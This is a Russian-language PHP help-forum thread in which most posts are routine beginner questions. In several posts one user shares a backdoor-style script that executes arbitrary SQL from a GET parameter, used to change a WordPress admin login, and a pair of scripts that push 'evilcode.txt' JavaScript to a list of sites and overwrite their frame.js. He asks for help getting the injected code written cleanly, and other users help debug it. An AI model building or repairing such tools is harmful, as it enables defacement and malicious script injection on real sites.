[php] Новичкам: задаем вопросы

Discussion in 'PHP' started by _Great_, 26 May 2007.

Thread Status:
Not open for further replies.
  1. loze_mc

    loze_mc New Member

    Joined:
    2 Oct 2011
    Messages:
    31
    Likes Received:
    0
    Reputations:
    0
    PHP:
    <?
    $quote file("http://blog/templates/blue_warez/quotes.txt");
      
    srand((double)microtime()*1000000);
      echo 
    $quote[rand(0,count($quote))];  
    ?> 
    проблема именно в том что скрипт не хочет работать, а почему я не пойму, может он для DLE не подходит?! ссылка действительно существует..
     
    #19761 loze_mc, 2 Jan 2012
    Last edited: 2 Jan 2012
  2. LStr1ke

    LStr1ke Elder - Старейшина

    Joined:
    29 Jul 2009
    Messages:
    800
    Likes Received:
    145
    Reputations:
    73
    Пройдитесь по всем пунктам в комментарии выше вашего.
     
  3. loze_mc

    loze_mc New Member

    Joined:
    2 Oct 2011
    Messages:
    31
    Likes Received:
    0
    Reputations:
    0
    исправил
    Что такое short_tags?
    Это шаблон DLE 9.2
     
    #19763 loze_mc, 2 Jan 2012
    Last edited: 2 Jan 2012
  4. daniel777

    daniel777 Elder - Старейшина

    Joined:
    8 Jul 2010
    Messages:
    517
    Likes Received:
    90
    Reputations:
    37
    http://www.blog.com/templates/blue_warez/quotes.txt
    Page Not Found

    Начинай с этого.
     
  5. loze_mc

    loze_mc New Member

    Joined:
    2 Oct 2011
    Messages:
    31
    Likes Received:
    0
    Reputations:
    0



    та я на денвере работаю...
     
  6. daniel777

    daniel777 Elder - Старейшина

    Joined:
    8 Jul 2010
    Messages:
    517
    Likes Received:
    90
    Reputations:
    37
    Еще функция file() не умеет работать с http протоколом.
     
  7. LStr1ke

    LStr1ke Elder - Старейшина

    Joined:
    29 Jul 2009
    Messages:
    800
    Likes Received:
    145
    Reputations:
    73
    Кто вам такое сказал?
    http://docs.php.net/manual/en/function.file.php
     
  8. loze_mc

    loze_mc New Member

    Joined:
    2 Oct 2011
    Messages:
    31
    Likes Received:
    0
    Reputations:
    0

    и что делать?
     
  9. LStr1ke

    LStr1ke Elder - Старейшина

    Joined:
    29 Jul 2009
    Messages:
    800
    Likes Received:
    145
    Reputations:
    73
    Помойму в шаблонах dle нельзя выполнять php, гуглите способы решения. Уверен кто-то уже нашел )
     
  10. daniel777

    daniel777 Elder - Старейшина

    Joined:
    8 Jul 2010
    Messages:
    517
    Likes Received:
    90
    Reputations:
    37
    Извиняюсь, ошибся. Был неправильно прописан URL.
     
  11. SergioBlog

    SergioBlog New Member

    Joined:
    21 Jan 2011
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    Вопросец такой, есть код:
    PHP:
    $query $_GET['zapros'];  
    $res mysql_query($query);  
    echo 
    '<PRE>'
    while(
    $result mysql_fetch_assoc($res)) {     
    print_r($result);
    Базы, таблицы, колонки нормально выводятся, но когда пытаюсь обновить какие-то данные в бд или заюзать load_file - выдаёт
    Похоже что это выдаёт всегда когда в запросе присутствуют кавычки.
    Подскажите как решить проблему.
     
  12. Gifts

    Gifts Green member

    Joined:
    25 Apr 2008
    Messages:
    2,494
    Likes Received:
    807
    Reputations:
    614
    SergioBlog никогда не подставлять необработанные данные в запрос.

    А вообще - у вас включена директива magic_quote_gpc. Обрабатывайте $_GET['zapros'] с помощью функции http://php.net/stripslashes
     
    _________________________
  13. Ataman

    Ataman New Member

    Joined:
    7 Dec 2011
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    magic_quotes включены?
    покажи запрос.
     
  14. SergioBlog

    SergioBlog New Member

    Joined:
    21 Jan 2011
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    Да, действительно проблема связана с magic_quote_gpc.
    После прогона через stripslashes все стало на свои места :) Спасибо!)

    UPD!
    Снова такая же ошибка при попытке апдейта какого-нибудь поля) C load_file всё ок.

     
    #19774 SergioBlog, 3 Jan 2012
    Last edited: 3 Jan 2012
  15. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    2,029
    Likes Received:
    913
    Reputations:
    199
    SergioBlog, покажи ошибку, может пользователь не имеет привилегий на UPDATE
     
    _________________________
  16. Gifts

    Gifts Green member

    Joined:
    25 Apr 2008
    Messages:
    2,494
    Likes Received:
    807
    Reputations:
    614
    SergioBlog если быть точными, то выводите ошибку, позволяющую хоть что-то понять.
    PHP:
     $query stripslashes($_GET['zapros']);  
    $res mysql_query($query);  
    if (!
    $res) {echo 'Mysql error: '.mysql_error(); die();}
    echo 
    '<PRE>'
    while(
    $result mysql_fetch_assoc($res)) {     
    print_r($result);
    }  
     
    _________________________
  17. SergioBlog

    SergioBlog New Member

    Joined:
    21 Jan 2011
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    при запросе
    update cialis.wptest_users set user_login="adm" where ID=1

    выдаёт
    Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/script.php

    юзер - рут, права есть.


    Есть ещё вопрос по скриптам, есть 2 скрипта:
    PHP:
    <?
    $jscode file_get_contents('evilcode.txt'); 
    $data "writejs=" "$jscode";
    $links file("links.txt");
    for(
    $i=0;$i<count($links);$i++) {

      if( 
    $curl curl_init() ) {
        
    curl_setopt($curlCURLOPT_URL$links[$i]);
        
    curl_setopt($curlCURLOPT_RETURNTRANSFER,true);
        
    curl_setopt($curlCURLOPT_POSTtrue);
        
    curl_setopt($curlCURLOPT_POSTFIELDS$data);
        
    $out curl_exec($curl);
        echo 
    $out;
        echo(
    'ok sended!');
        
    curl_close($curl);
      }
      else { echo (
    'not sended!'); }
    }
    ?>

    PHP:
    <?
    $param $_POST['writejs'];
    if (isset(
    $param)) 
    {
    $open fopen('/var/www/frame.js''a');
    ftruncate($open0);
    $writefunc fwrite($open$param);
    fclose($open);
    echo(
    "ok<br>");
    }
    else { echo(
    "recieve error"); }
    ?>
    Первый отправляет нужный мне жс код на второй с помощь пост запроса. Так вот в итоге в файл frame.js записывается js код в виде:
    <script>
    alert(\'preved\')
    </script>

    хотя отправляется без слешей. Подскажите как убрать слеши, пробовал с urlencode() - всё равно со слешами пишет.
     
    #19777 SergioBlog, 3 Jan 2012
    Last edited: 3 Jan 2012
  18. Flisk

    Flisk Member

    Joined:
    4 Aug 2010
    Messages:
    147
    Likes Received:
    8
    Reputations:
    -2
    Подскажите пожалуйста по редактированию строк. Есть файлы, в них строки вида
    Code:
    Camtasia Producer v3.0.0
    Camtasia Studio 2.0.0 SN
    Camtasia Studio 7.0 
    Camtasia Studio 7.0.0
    Hair.Master.v4.3547158.Full.rar
    Camtasia Studio v2.0.0
    Camtasia Studio v2.03
    Мне надо удалять с них ненужные слова, для чего я использую функцию:
    Code:
    function edit_text($a)
    {
    $i = stripos($a,"keygen");
        if ($i == true)
            $a = substr($a,0,$i);
    $i = stripos($a,"by ");
        if ($i == true)
            $a = substr($a,0,$i);
    $i = stripos($a,"by.");
        if ($i == true)
            $a = substr($a,0,$i);
    $i = stripos($a,".zip");
        if ($i == true)
            $a = substr($a,0,$i);
    $i = stripos($a,"serial");
        if ($i == true)
            $a = substr($a,0,$i);
    $i = stripos($a,"patch");
        if ($i == true)
            $a = substr($a,0,$i);
    $i = stripos($a,"build");
        if ($i == true)
            $a = substr($a,0,$i);
    $i = stripos($a,".rar");
        if ($i == true)
            $a = substr($a,0,$i);
    $i = stripos($a,"by-");
        if ($i == true)
            $a = substr($a,0,$i);
    return $a;
    }
    Код такой:
    Code:
    $unedit_data = file("a.txt");
        foreach ($unedit_data as &$a)
            {
            $a = edit_text($a);
            file_put_contents("edited".$val.".txt",$a,FILE_APPEND); 
            }
    Или такой:
    Code:
    $unedit_data = file("a.txt");
        foreach ($unedit_data as &$a)
            {
            $a = edit_text($a);
            $edited_data[]=$a;
            }
    file_put_contents("edited.txt",$edited_data,FILE_APPEND);
    В общем, как не делай, но если в строке был искомый символ, то следующая за ней строка "склеивается" с этой. (вида
    Hair.Master.v4.3547158.Full.Camtasia Studio v2.0.0
    Почему это может быть и как это убрать (т.е. чтобы функция просто редактировала строку, а не склеивала ее со следующей. Если принудительно добавлять символ переноса строки, тогда он добавляется ко всем строкам, и выходит ерунда.
     
  19. LStr1ke

    LStr1ke Elder - Старейшина

    Joined:
    29 Jul 2009
    Messages:
    800
    Likes Received:
    145
    Reputations:
    73
    PHP:
    $unedit_data file("a.txt");
        foreach (
    $unedit_data as &$a)
            {
            
    $a edit_text($a);
            
    file_put_contents("edited".$val.".txt",$a.PHP_EOL,FILE_APPEND); 
            }
    или

    PHP:
    $unedit_data file("a.txt");
        foreach (
    $unedit_data as &$a)
            {
            
    $a edit_text($a);
            
    $edited_data[]=$a;
            }
    file_put_contents("edited.txt",implode(PHP_EOL,$edited_data),FILE_APPEND);
     
  20. loze_mc

    loze_mc New Member

    Joined:
    2 Oct 2011
    Messages:
    31
    Likes Received:
    0
    Reputations:
    0
    подскажите скрипт который будет выводить на экран любую картинку из определенной папки
     
Loading...
Thread Status:
Not open for further replies.